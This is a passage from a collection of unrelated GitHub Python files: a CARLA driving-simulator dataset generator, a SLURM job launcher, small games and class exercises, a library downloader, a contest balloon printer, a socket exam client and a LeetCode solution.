cam_bp = blueprint_library.find('sensor.camera.rgb')\n cam_bp.set_attribute('image_size_x', '608')\n cam_bp.set_attribute('image_size_y', '608')\n # cam_bp.set_attribute('motion_blur_intensity', '1')\n # cam_bp.set_attribute('motion_blur_max_distortion', '1')\n sensor_transform = carla.Transform(carla.Location(x=2.5, z=2))\n self.rgb_sensor = self.world.spawn_actor(cam_bp, sensor_transform, attach_to=self.ego_vehicle)\n self.rgb_sensor.listen(lambda image: self.process_img(image, rgb=True))\n\n\n # Get the attributes from the camera\n image_w = cam_bp.get_attribute(\"image_size_x\").as_int()\n image_h = cam_bp.get_attribute(\"image_size_y\").as_int()\n fov = cam_bp.get_attribute(\"fov\").as_float()\n\n # Calculate the camera projection matrix to project from 3D -> 2D\n self.K = self.build_projection_matrix(image_w, image_h, fov)\n self.current_camera_image = None\n\n CarlaDataProvider.set_client(self.client)\n CarlaDataProvider.set_world(self.world)\n\n self.ego_traffic_light, self.op_traffic_light = self.get_traffic_lights()\n affected_waypoints = self.op_traffic_light.get_affected_lane_waypoints()\n num_wp = 0\n ego_tl_point = self.ego_traffic_light.get_affected_lane_waypoints()[0]\n self.ego_stop_pt = self.get_junction_stop_point(ego_tl_point)\n self.actor_stop_pt = self.get_junction_stop_point(affected_waypoints[0])\n \n \n # set the spectator to ego vehicle\n spectator = self.world.get_spectator()\n transform_vehicle = self.ego_vehicle.get_transform()\n spectator.set_transform(carla.Transform(transform_vehicle.location + carla.Location(z=50), carla.Rotation(pitch=-90)))\n time.sleep(1)\n\n\n \n self.junction_annotator = JunctionAnnotator(self.world, ego_vehicle=self.ego_vehicle, camera_bp=cam_bp, camera=self.sensor)\n self.state_extractor = StateExtractor()\n\n self.count = 0\n\n # Set the world in synchronous mode\n settings = self.world.get_settings()\n settings.synchronous_mode = True\n settings.fixed_delta_seconds = 0.1 # 0.05 seconds (20 FPS)\n self.world.apply_settings(settings)\n \n def get_junction_stop_point(self, current_tl_stop_point):\n intersection = self.get_next_intersection(current_tl_stop_point)\n ent_exit_pts = intersection.get_waypoints(carla.LaneType.Driving)\n junction_pts = []\n for sublish in ent_exit_pts:\n junction_pts.extend(sublish)\n loc_target = current_tl_stop_point.transform.location\n stop_point = None\n min_distance = 1e9\n for point in junction_pts:\n loc = point.transform.location\n dist = loc.distance(loc_target)\n if dist < min_distance:\n stop_point = point\n min_distance = dist\n return stop_point\n\n def get_next_intersection(self, waypoint):\n list_of_waypoints = []\n while waypoint and not waypoint.is_intersection:\n list_of_waypoints.append(waypoint)\n waypoint = waypoint.next(2.0)[0]\n\n # If the list is empty, the actor is in an intersection\n if not list_of_waypoints:\n return waypoint.get_junction()\n else:\n return waypoint.get_junction()\n \n def process_img(self, image: carla.Image, rgb=False):\n # Convert the image from CARLA format to an OpenCV image (RGB)\n frame_id = image.frame\n image_file_name = f\"{self.scenario_name}_{frame_id}\"\n if not self.data_collection_started or not self.keep_frame(frame_id):\n # print(f\"skipping img frame {frame_id}\")\n return\n \n if rgb:\n # print(f\"RGB image frame: {frame_id}\")\n image.save_to_disk(f\"./recording/{self.start_timestamp}/rgb/{image_file_name}.png\")\n self.current_rgb_image_index = frame_id\n else:\n # print(f\"image frame: {frame_id}\")\n image.save_to_disk(f\"./recording/{self.start_timestamp}/instance/{image_file_name}.png\")\n self.current_image_index = frame_id\n\n def get_traffic_lights(self) -> Tuple[carla.TrafficLight, carla.TrafficLight]:\n ego_light = self.ego_vehicle.get_traffic_light()\n op_traffic_light = self.op_traffic_light = CarlaDataProvider.annotate_trafficlight_in_group(ego_light)[\"opposite\"][0]\n return ego_light, op_traffic_light\n\n \n def get_ego_and_other_vehicles(self) -> Tuple[carla.Vehicle, List[carla.Actor]]:\n ego_vehicle = None\n while ego_vehicle is None:\n print(\"Waiting for the ego vehicle...\")\n time.sleep(1)\n non_ego = []\n possible_vehicles = self.world.get_actors().filter('vehicle.*')\n for vehicle in possible_vehicles:\n if vehicle.attributes['role_name'] == 'hero':\n print(\"Ego vehicle found\")\n ego_vehicle = vehicle\n else:\n non_ego.append(vehicle)\n return ego_vehicle, non_ego\n \n def set_active_vehicle(self):\n for i in range(10000):\n for vehicle in self.other_vehicles:\n # print(vehicle.get_transform().location)\n if vehicle.get_transform().location.z > -3:\n if vehicle.get_transform().location.x == 0 and vehicle.get_transform().location.y == 0:\n return False\n self.active_scenario_vehicle = vehicle\n print(f\"found after {i} ticks\")\n return True\n self.dummy_tick = True\n self.world.tick()\n return False\n\n \n def get_state(self):\n other_vehicle_loc = self.active_scenario_vehicle.get_location()\n other_vehicle_wp = self.map.get_waypoint(other_vehicle_loc)\n actor_distance = other_vehicle_loc.distance(self.actor_stop_pt.transform.location)\n if other_vehicle_wp.is_junction:\n actor_distance = -actor_distance\n \n ego_loc = self.ego_vehicle.get_location()\n ego_wp = self.map.get_waypoint(ego_loc)\n # ego_distance = ego_loc.distance(self.ego_stop_pt.transform.location)\n ego_distance = len(interpolate_wp_trajectory(self.world, [ego_wp, self.ego_stop_pt], 1))\n if ego_wp.is_junction:\n ego_distance = -len(interpolate_wp_trajectory(self.world, [self.ego_stop_pt, ego_wp], 1))\n \n \n return ego_distance, actor_distance\n\n \n def save_to_csv(self, data_list, filename=\"states.csv\"):\n filepath = f\"./recording/{self.start_timestamp}/{filename}\"\n file_exists = os.path.isfile(filepath)\n headers = ['image_file_name', 'ego_distance', 'ego_velocity', 'actor_distance', 'ego_junction_distance', 'actor_junction_distance']\n with open(filepath, 'a') as csvfile:\n writer = csv.DictWriter(csvfile, delimiter=',', lineterminator='\\n', fieldnames=headers)\n if not file_exists:\n writer.writeheader()\n for data in data_list:\n writer.writerow(data)\n\n def keep_frame(self, frame_id):\n if self.no_skipped_frames == 0:\n return True\n if (frame_id - self.starting_frame) % self.no_skipped_frames == 0:\n return True\n return False\n\n def start_data_collection(self):\n data = []\n # Setting the light to green is the trigger for scenario. See DatasetGenSurrogateModel scenario\n self.ego_traffic_light.freeze(False)\n self.ego_traffic_light.set_state(carla.TrafficLightState.Green)\n print(\"Triggered the light\")\n count = 0\n previous_ego_distance, previous_actor_distance = 0, 0\n\n self.starting_frame = self.world.get_snapshot().frame\n self.data_collection_started = True\n while True:\n if self.active_scenario_vehicle.get_transform().location.z < -4:\n if not self.set_active_vehicle():\n print(\"no active non scenario vehicle for 100 ticks\")\n break\n \n frame_id = self.world.get_snapshot().frame\n if not self.keep_frame(frame_id):\n # print(f\"skipping frame {frame_id}\")\n self.world.tick()\n continue\n \n if self.agent.done():\n print(\"The target has been reached, stopping the simulation\")\n break\n \n while self.current_image_index < frame_id or self.current_rgb_image_index < frame_id:\n time.sleep(0.1)\n # print(\"waiting for image sync\")\n self.world.tick()\n self.sensor.destroy()\n \n def read_csv_frames(self, filename=\"states.csv\"):\n filepath = f\"./recording/{self.start_timestamp}/{filename}\"\n if not os.path.exists(filepath):\n return []\n \n frames = []\n with open(filepath, 'r') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n frames.append(row['image_file_name'][:-2])\n return frames\n\n def get_saved_frames(self, directory_name):\n dir_path = f\"./recording/{self.start_timestamp}/{directory_name}\"\n if not os.path.exists(dir_path):\n return []\n \n frames = [filename.split('.')[0] for filename in os.listdir(dir_path) if filename.endswith('.png')]\n return frames\n \n def delete_csv_entry(self, frame_id, filename=\"states.csv\"):\n filepath = f\"./recording/{self.start_timestamp}/{filename}\"\n if not os.path.exists(filepath):\n return\n\n with open(filepath, 'r') as csvfile:\n lines = csvfile.readlines()\n with open(filepath, 'w') as csvfile:\n for line in lines:\n if line.split(',')[0] != str(frame_id):\n csvfile.write(line)\n \n \n def verify_and_delete_mismatched_frames(self):\n csv_frames = self.read_csv_frames()\n saved_instance_frames = self.get_saved_frames(\"instance\")\n saved_rgb_frames = self.get_saved_frames(\"rgb\")\n\n # Frames present in CSV but not in the saved images\n for frame in csv_frames:\n if frame not in saved_instance_frames:\n # Deleting CSV entry\n self.delete_csv_entry(frame)\n if frame not in saved_rgb_frames:\n # Deleting CSV entry\n self.delete_csv_entry(frame)\n\n # Frames present in saved images but not in the CSV\n for frame in saved_instance_frames:\n if frame not in csv_frames:\n os.remove(f\"./recording/{self.start_timestamp}/instance/{frame}.png\")\n \n for frame in saved_rgb_frames:\n if frame not in csv_frames:\n os.remove(f\"./recording/{self.start_timestamp}/rgb/{frame}.png\")\n\n\n\n \n def cleanup(self):\n CarlaDataProvider.cleanup()\n self.sensor.destroy()\n\nif __name__ == \"__main__\":\n import subprocess\n import os\n import signal\n junction_params = {\n 1: [30, 31],\n 2: [30, 32],\n 3: [31, 37],\n 4: [29, 36]\n }\n start_record_name = time.time()\n start_record_name = \"new_dataset\"\n try:\n for i in range(1, 5):\n # carla_simulator = subprocess.Popen(\"/opt/carla-simulator/CarlaUE4.sh -prefernvidia\", shell=True, preexec_fn=os.setsid)\n # print(\"waiting for simulator startup\")\n # time.sleep(20)\n scenario_name = f\"DatasetGenPerceptionModelRS_{i}\"\n junction_param = junction_params.get(i)\n print(f\"starting scenario: {scenario_name}\")\n # scenario = subprocess.Popen([\"python3\", \"./scenario_runner/scenario_runner.py\", \"--scenario\", scenario_name, \"--reloadWorld\"], preexec_fn=os.setsid)\n print(\"waiting for scenario to start\")\n # time.sleep(30)\n print(\"scenario started\")\n print(\"starting data collection\")\n datasetgenerator = DatasetGenPerceptionModelAgent(start_record_name, scenario_name, junction_param[0], junction_param[1])\n datasetgenerator.start_data_collection()\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(carla_simulator.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(carla_simulator.pid), signal.SIGTERM)\n # time.sleep(2)\n # os.killpg(os.getpgid(carla_simulator.pid), signal.SIGTERM)\n # print(\"killing the simulator\")\n # time.sleep(10)\n datasetgenerator.verify_and_delete_mismatched_frames()\n except KeyboardInterrupt:\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n # os.killpg(os.getpgid(scenario.pid), signal.SIGTERM)\n datasetgenerator.cleanup()\n \n","repo_name":"arehman1806/carla-experiments-RDDPS","sub_path":"dataset_gen_perception_model_agent_rs.py","file_name":"dataset_gen_perception_model_agent_rs.py","file_ext":"py","file_size_in_byte":15814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6498976337","text":"#\n\nimport sys\nimport os\nimport glob\n\nif(len(sys.argv) >= 2):\n base_dir=sys.argv[1]\nelse:\n print(\"Error no input parameter for start directory.\")\n exit(1)\n\n#get all dir names in base_dir\nfor root, dirs, files in os.walk(base_dir, topdown=False):\n for name in dirs:\n cur_dir = os.path.join(root, name)\n\n #get the fastq.gz R1 and R2 files\n r1_file = glob.glob(cur_dir + '/*R1_001.fastq.gz')[0]\n r1_file = os.path.split(r1_file)[1]\n r2_file = glob.glob(cur_dir + '/*R2_001.fastq.gz')[0]\n r2_file = os.path.split(r2_file)[1]\n\n print(f\"sbatch run_process_okseq.sh '{cur_dir}' '{base_dir}' '{r1_file}' '{r2_file}' 'aligned.sam' '{name}_log.txt' '{name}_out.txt'\")\n print(\"\")\n os.system(f\"sbatch run_process_okseq.sh '{cur_dir}' '{base_dir}' '{r1_file}' '{r2_file}' 'aligned.sam' '{name}_log.txt' '{name}_out.txt'\")\n\n","repo_name":"FenyoLab/Ok-Seq_Processing","sub_path":"run_on_server.py","file_name":"run_on_server.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18133958018","text":"def checkWinning(mat,win,player):\n for i in range(3):\n if mat[i][0]==mat[i][1]==mat[i][2]!=\"_\": # vertical\n win[player]=True\n return\n if mat[0][i]==mat[1][i]==mat[2][i]!=\"_\": # horizontal\n win[player]=True\n return\n if mat[0][0]==mat[1][1]==mat[2][2]!=\"_\": # diagonal_1\n win[player]=True\n return\n if mat[0][2]==mat[1][1]==mat[2][0]!=\"_\": # diagonal_2\n win[player]=True\n return\n\nif __name__==\"__main__\":\n players=[input(\"Enter Name of Player 1 (X): \"),input(\"Enter Name of Player 2 (0): \")]\n marked=0\n turn=0\n print(\"\\nGRID:\\n1 2 3\\n4 5 6\\n7 8 9\")\n positions={\n '1':[0,0], '2':[0,1], '3':[0,2],\n '4':[1,0], '5':[1,1], '6':[1,2],\n '7':[2,0], '8':[2,1], '9':[2,2],\n }\n matrix=[[\"_\"]*3 for _ in range(3)]\n win=[False,False]\n while marked<9 and not (win[0] or win[1]):\n print(\"\\n{}'s Turn\".format(players[turn]))\n for mat in matrix:\n print(*mat)\n pos=input(\"Enter Position: \")\n try:\n r,c=positions[pos]\n if matrix[r][c]=='_':\n matrix[r][c]='X' if turn==0 else '0'\n checkWinning(matrix,win,turn)\n turn=1-turn\n marked+=1\n else:\n print(\"Already Occupied\")\n except:\n print(\"Invalid Position\")\n for mat in matrix:\n print(*mat)\n if win[0]:\n print(\"\\n{} WINS\".format(players[0]))\n elif win[1]:\n print(\"\\n{} WINS\".format(players[1]))\n else:\n print(\"\\nDRAW\")","repo_name":"YashnitKalra/Tic-Tac-Toe","sub_path":"Tic_Tac_Toe.py","file_name":"Tic_Tac_Toe.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15525239147","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom future.standard_library import install_aliases\ninstall_aliases()\n\nimport os, sys, zipfile\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom io import BytesIO\n\ndef download(platform, tag, destination):\n try:\n response = urlopen(\"https://cdn.hykr.io/res/riks/{0}/{1}/latest/libriks-{0}-{1}.zip\".format(platform, tag))\n except HTTPError as err:\n \ttry:\n \turlopen(\"https://cdn.hykr.io/res/riks/{0}\".format(platform))\n \traise Exception(\"{0} is not a valid tag for this platform.\".format(tag))\n \texcept HTTPError as err:\n\t \ttry:\n\t \turlopen(\"https://cdn.hykr.io/res/riks\")\n \t\traise Exception(\"{0} is not a valid platform.\".format(platform))\n\t \texcept HTTPError as err:\n\t \traise Exception(\"{0}: {1}\".format(err.code, err.reason))\n\n # Check destination\n if not os.path.isdir(destination):\n os.makedirs(destination)\n\n zipdata = BytesIO()\n total = int(response.headers[\"content-length\"])\n size = 0\n blockSize = 1024\n lastPercent = 0\n\n while True:\n block = response.read(blockSize)\n if not block:\n break\n zipdata.write(block)\n size += len(block)\n percent = int(round(100 * size / total))\n if percent > lastPercent:\n hash = ((60 * percent) // 100)\n print(\"[{}{}] {}%\".format('#' * hash, ' ' * (60 - hash), percent) + '\\r', end='')\n lastPercent = percent\n\n with zipfile.ZipFile(zipdata) as z:\n z.extractall(destination)\n\ndef main():\n # Check number of arguments\n if len(sys.argv) <= 3:\n raise Exception(\"Usage: python download.py ()\")\n\n download(sys.argv[1], sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else \".\")\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n print(str(e))\n","repo_name":"hyker/riks-hello-world-cpp","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4731197194","text":"# Given an integer array nums sorted in non-decreasing order, return an array of the squares of each number sorted in non-decreasing order.\n\n# Example 1:\n\n# Input: nums = [-4,-1,0,3,10]\n# Output: [0,1,9,16,100]\n# Explanation: After squaring, the array becomes [16,1,0,9,100].\n# After sorting, it becomes [0,1,9,16,100].\n\nclass Solution:\n def sortedSquares(self, nums: List[int]) -> List[int]:\n ln = len(nums)\n for right in range(ln):\n if nums[right] >= 0:\n break\n \n left = right - 1\n res = []\n while right < ln or left >= 0:\n if left >= 0 and right < ln:\n if abs(nums[left]) > nums[right]:\n res.append(nums[right]**2)\n right += 1\n else:\n res.append(nums[left]**2)\n left -= 1\n elif left >= 0:\n res.append(nums[left]**2)\n left -= 1\n elif right < ln:\n res.append(nums[right]**2)\n right += 1\n return res\n","repo_name":"dimoka777/leetcode-solutions","sub_path":"977. Squares of a Sorted Array.py","file_name":"977. Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1540956572","text":"#!/usr/bin/env python3\nimport sys, os, argparse, re, json\nimport time\nfrom lxml import etree\nfrom bs4 import BeautifulSoup as Soup\nfrom subprocess import run\n\n### Setup argument parser\nparser = argparse.ArgumentParser(description=\"Balloon Sheet Printer\")\nparser.add_argument('-l','--log',default='balloon.log',\n help='Store delivered balloons (default: balloon.log)')\nparser.add_argument('-c','--cont',default=True,type=eval,\n help='Continue to deliver (default: True)')\n\nargs = parser.parse_args()\n\nos.makedirs('printed',exist_ok=True)\n\nwith open(args.log,'at'):\n pass\n\ndelivered = {}\nif args.cont:\n with open(args.log) as FILE:\n for line in FILE:\n try:\n teamID, probID, runID, penalty = line.strip().split()\n delivered[(teamID,probID)]={'run': runID, 'time': penalty}\n except:\n print('failed to parse old log:',line.strip(),file=sys.stderr)\n\n# Main loop\nline_buf = []\nfor line in sys.stdin:\n line = line.strip()\n # print('ECHO',line,file=sys.stderr)\n # print('LINE_BUF',line_buf,file=sys.stderr)\n if len(line_buf) == 0 and line == '':\n line_buf.append(line)\n elif len(line_buf):\n line_buf.append(line)\n if line_buf and line == '':\n s = Soup('\\n'.join(line_buf),'lxml')\n if s.find('judged').text == 'True' and s.find('solved').text == 'true':\n runID = s.find('id').text\n probID = chr(ord('A')-1+int(s.find('problem').text))\n teamID = s.find('team').text\n penalty = int(float(s.find('time').text)/60)\n # Supposed to be printed here\n if (teamID,probID) not in delivered:\n filename = 'printed/T{}_P{}_R{}'.format(teamID,probID,runID)\n with open(filename,'wt') as FILE:\n print('''\n\n Balloon Delivery Sheet\n\n\n\n\n\n Team {} solved Problem {}\n Run {} at {} minutes\n\n\n\n\n\n Delivered by:\n'''.format(teamID,probID,runID,penalty),file=FILE)\n run(['lp','-o','lpi=1.9','-o','cpi=3.5',filename])\n with open(args.log,'at') as FILE:\n print(teamID,probID,runID,penalty,file=FILE)\n delivered[(teamID,probID)]={'run': runID, 'time': penalty}\n time.sleep(1)\n line_buf = []\n\nprint('The connection to the event feeder is closed.')\n","repo_name":"mzshieh/tw-icpc-pc2","sub_path":"balloon/balloon.py","file_name":"balloon.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"18179265619","text":"class Time:\n def __init__(self,h,m,s):\n self.hour = h\n self.min = m\n self.sec = s\n self.fix()\n\n def show(self):\n print(self.hour,\":\",self.min,\":\",self.sec)\n\n def sum (self, other):\n sec = self.sec + other.sec\n min = self.min + other.min\n hour = self.hour + other.hour\n\n result = Time(hour, min, sec)\n self.fix()\n return result\n\n def sud(self,other):\n sec = self.sec - other.sec\n min = self.min - other.min\n hour = self.hour - other.hour\n \n result = Time(hour, min, sec)\n self.fix()\n return result\n \n def time_to_sec(self):\n result = (self.hour * 60 + self.min) * 60 + self.sec\n return result\n @staticmethod\n def sec_to_time(second):\n secs = second\n hour = secs//3600\n min = (secs - hour * 3600) // 60\n sec = (secs - hour * 3600) - min * 60\n result = Time(hour, min, sec)\n return result\n def thr_to_gmt(self):\n tehran_time = Time(3, 30, 0)\n result = Time.sum(self, tehran_time)\n return result\n def fix(self):\n if self.sec >= 60:\n while True:\n if self.sec >= 60:\n self.sec -= 60\n self.min += 1\n else:\n break\n if self.min>=60:\n while True:\n if self.min >= 60:\n self.min -= 60\n self.hour += 1\n else:\n break\n if self.sec < 0:\n while True:\n if self.sec < 0:\n self.sec += 60\n self.min -= 1\n else:\n break\n if self.min < 0:\n while True:\n if self.min < 0:\n self.min += 60\n self.hour -= 1\n else:\n break\n \ndef show_menu():\n print(\"Fraction Class\")\n print(\"1.Summation Times\")\n print(\"2.Subtraction Times\")\n print(\"3.Time to Second\")\n print(\"4.Seconds to Time\")\n print(\"5.GMT to Tehran\")\n\nwhile True:\n show_menu()\n choose = input(\"\\nEnter number of your choice : \")\n\n if choose == \"1\":\n sec1 = int(input(\"Enter first second : \"))\n min1 = int(input(\"Enter first minute : \"))\n hour1 = int(input(\"Enter first hour : \"))\n sec2 = int(input(\"Enter second second : \"))\n min2 = int(input(\"Enter second minute : \"))\n hour2 = int(input(\"Enter second hour : \"))\n time1 = Time(hour1, min1, sec1)\n time2 = Time(hour2, min2, sec2)\n result = time1.sum(time2)\n result.show()\n elif choose == \"2\":\n sec1 = int(input(\"Enter first second : \"))\n min1 = int(input(\"Enter first minute : \"))\n hour1 = int(input(\"Enter first hour : \"))\n sec2 = int(input(\"Enter second second : \"))\n min2 = int(input(\"Enter second minute : \"))\n hour2 = int(input(\"Enter second hour : \"))\n time1 = Time(hour1, min1, sec1)\n time2 = Time(hour2, min2, sec2)\n result = time1.sum(time2)\n result.show()\n elif choose == \"3\":\n sec = int(input(\"Enter second : \"))\n min = int(input(\"Enter minute : \"))\n hour = int(input(\"Enter hour : \"))\n time = Time(hour, min, sec)\n result = time.time_to_sec()\n print(result)\n elif choose == \"4\":\n second = int(input(\"Enter seconds : \"))\n result = Time.sec_to_time(second)\n result.show()\n elif choose == \"5\":\n sec = int(input(\"Enter second : \"))\n min = int(input(\"Enter minute : \"))\n hour = int(input(\"Enter hour : \"))\n time = Time(hour, min, sec)\n result = time.thr_to_gmt()\n result.show()\n elif choose == \"exit\":\n exit()\n else:\n print(\"Please just enter number of your choice or enter 'exit' to exit\\n\\n\")\n \n","repo_name":"SobhanSaeedi7/Python-Course-Assaignments","sub_path":"Homework-11/2.Time.py","file_name":"2.Time.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"28447783942","text":"import socket\nimport host\nimport datetime\nimport exam\nimport json\nimport time\nimport random\n\n\nclass Elf(host.Host):\n\t\"\"\" Elf class\n\n\tArguments:\n\t\tthreading {Thread} -- runnable\n\t\"\"\"\n\n\tdef __init__(self, config):\n\t\t\"\"\" Constructor\n\n\t\tArguments:\n\t\t\tconfig {dict} -- server\n\t\t\"\"\"\n\t\thost.Host.__init__(self, config)\n\t\tself.client = socket.socket()\n\t\tself.santa_addr = (self.config[\"santa\"].config[\"host\"],\n\t\t self.config[\"santa\"].config[\"port\"])\n\t\tself.fairy_addr = (self.config[\"fairy\"].config[\"host\"],\n\t\t self.config[\"fairy\"].config[\"port\"])\n\t\tself.one_more = False\n\t\tself.fairy = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.logger.info(\"\\t\\tFinished initializing %s, id: %s\",\n\t\t self.__class__.__name__, self.config['id'])\n\t\tself.dismissed = False\n\n\tdef run(self):\n\t\t\"\"\" Upon thread start\n\t\t\"\"\"\n\t\tself.client.connect(self.santa_addr)\n\t\tself.fairy.connect(self.fairy_addr)\n\t\twhile not self.dismissed:\n\n\t\t\trequest = {\"action\": \"where\"}\n\t\t\tself.client.sendall(json.dumps(request))\n\t\t\tdata = self.client.recv(4096)\n\t\t\tresult = json.loads(data)\n\t\t\tself.logger.info(\"\\t\\tClient recieved result for login: %s\", data)\n\t\t\tif result['result'] == 'nowhere':\n\t\t\t\tself.logger.error('no more destination..')\n\t\t\t\tself.dismissed = True\n\t\t\telse:\n\t\t\t\ttime.sleep(random.randint(1, 11))\n\t\t\t\tresponse = {\"action\": \"done\"}\n\t\t\t\tself.client.sendall(json.dumps(response))\n\t\t\t\tdata = self.client.recv(4096)\n\t\t\t\tresult = json.loads(data)\n\n\t\t\t\tif result['result'] == 'good_job':\n\t\t\t\t\tself.logger.info(\"\\tHooray!\")\n\t\t\t\telif result['result'] == 'dismissed':\n\t\t\t\t\tself.dismissed = True\n\t\t\t\t\tself.logger.critical(\"\\tBoo-hoo!\")\n\t\t\t\t\tfairy_request = json.dumps({\"action\": \"help\"})\n\t\t\t\t\tself.fairy.sendto(fairy_request, self.fairy_addr)\n\t\t\t\t\tself.logger.info(\"\\t\\t\\tWent to the fairy!: %s\", fairy_request)\n\n\t\t\t\t\tfairy_response_str, address = self.fairy.recvfrom(4096)\n\t\t\t\t\tself.logger.info(\"\\t\\t\\tGot message from the fairy!: %s\",\n\t\t\t\t\t fairy_response_str)\n\t\t\t\t\tfairy_response = json.loads(fairy_response_str)\n\t\t\t\t\tif fairy_response[\"response\"] == 'nowhere':\n\t\t\t\t\t\tself.logger.critical(\"\\tBoo-hoo-HOO!\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.logger.critical(\"\\tYES!\")\n\t\t\t\t\t\tself.one_more = True\n\t\t\t\t\t\tself.dismissed = False\n\t\t\"\"\"\n\t\tfor message in self.messages:\n\t\t\ttime.sleep(1)\n\t\t\tself.client.sendall(message)\n\t\t\tself.logger.info(\"\\t\\tClient request sent: %s\", message)\n\t\t\tdata = self.client.recv(4096)\n\t\t\tself.logger.info(\"\\t\\tClient recieved response: %s\", data)\n\t\t\tresult = json.loads(data)\n\n\t\t\tself.logger.info(\"\\t\\t\\t\\t result of: %s, is: %s\", message, result[\"result\"])\n\t\t\n\t\t\"\"\"\n\t\tself.client.close()\n\n\nif __name__ == '__main__':\n\texam.run()\n","repo_name":"AlexAegis/elte-cn","sub_path":"exam/exam_elf.py","file_name":"exam_elf.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"3719065711","text":"import sys\n\nkey = sys.argv[1:]\nif key:\n with open('bakery.csv', encoding='utf-8') as f:\n sales = [line.strip() for line in f.readlines()]\n if len(key) == 1:\n sale = sales[int(key[0]):]\n print('\\n'.join(sale))\n elif len(key) == 2:\n sale = sales[int(key[0]):int(key[1]) + 1]\n print('\\n'.join(sale))\n\nwith open('bakery.csv', encoding='utf-8') as f:\n sales = [line.strip() for line in f.readlines()]\n print(sales[1:])\n","repo_name":"evgenytihonov/Basic_Python","sub_path":"Lesson_6/show_sales.py","file_name":"show_sales.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34190347433","text":"# UTS PBO - Andhi Prasetyo - C20010004\n\nclass Kasir: # Nama Class\n nopesanan = 0\n hargaTotal = 0\n hargaTambahan = 0\n hargabayar = 0\n\n def __init__(self, # Constructor\n inputnama, \n inputjml, \n inputharga\n ):\n\n self.nama = inputnama\n self.jumlah = inputjml\n self.harga = inputharga\n\n Kasir.nopesanan += 1\n Kasir.hargaTotal = self.jumlah * self.harga\n Kasir.hargaTambahan = DataTransaksi.jumlah * DataTransaksi.harga\n Kasir.hargabayar = Kasir.hargaTotal + Kasir.hargaTambahan\n\n def tampil(self):\n print(\"\\n\")\n print(\"===== TAMPIL TRANSAKSI =====\")\n print(\"Nomor Pesanan\\t: \", Kasir.nopesanan)\n print(\"Nama Pesanan\\t: \", self.nama)\n print(\"Jumlah Pesanan\\t: \", self.jumlah)\n print(\"Harga Satuan\\t: \", self.harga)\n print(\"Total Harga\\tNo: \", Kasir.hargaTotal)\n\n def total(self):\n print(\"\\n\")\n print(\"== TOTAL PEMBAYARAN ==\")\n print(\"Total Harga Bayar\\t: \", Kasir.hargabayar)\n print(\"\\n\")\n print(\"== TRANSAKSI SELESAI ==\")\n\nclass DataTransaksi(Kasir):\n\n print(\"\\n\")\n print(\"== INPUT DATA TAMBAHAN ==\")\n tambahan1 = input(\"Tambahan Item\\t: \")\n jumlah = int(input(\"Jumlah Item\\t: \"))\n harga = int(input(\"Harga Item\\t: \"))\n\n def tampiltambahan(self):\n print(\"\\n\")\n print(\"Tambah Pesanan\\t: \", DataTransaksi.tambahan1)\n print(\"Jumlah Tambahan\\t: \",DataTransaksi.jumlah)\n print(\"Harga Satuan\\t: \",DataTransaksi.harga)\n print(\"Harga Total\\t: \", Kasir.hargaTambahan)\n\n\nprint(\"\\n\")\nprint(\"== INPUT DATA PESANAN ==\")\ntransaksi1 = DataTransaksi(\n input(\"Nama Item\\t: \"), \n int(input(\"Jumlah Item\\t: \")), \n int(input(\"Harga Satuan\\t: \"))\n)\n\ntransaksi1.tampil()\ntransaksi1.tampiltambahan()\ntransaksi1.total()","repo_name":"trebuchet-uby/python-dev","sub_path":"OOP.UTS/Program2Kasir.py","file_name":"Program2Kasir.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"17571688831","text":"from collections import deque\n\n\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n \"\"\"\n 239. Sliding Window Maximum\n https://leetcode.com/problems/sliding-window-maximum/description/\n\n Explanation:\n Window position Max\n --------------- -----\n 0 1 2 3 4 5 6 7\n [1 3 -1]3 1 3 6 7 3\n 1 [3 -1 3] 1 3 6 7 3\n 1 3 [-1 3 1] 3 6 7 3\n 1 3 -1 [3 1 3] 6 7 3\n 1 3 -1 3 [1 3 6] 7 6\n 1 3 -1 3 1 [3 6 7] 7\n\n k = 2\n index 0 1 2 3\n value 1 1 1 1\n\n Use deque\n - remove index from window, remove index <= i - k (2 - 2) 0\n - remove indices having values smaller than or equals to the value to be added.\n A left emement in dq is always greater than the right element of it.\n - dq[0] is the current max in the window, add the dq[0] since i >= k - 1 (1)\n\n index [0 1] 2\n value [4 > 3] 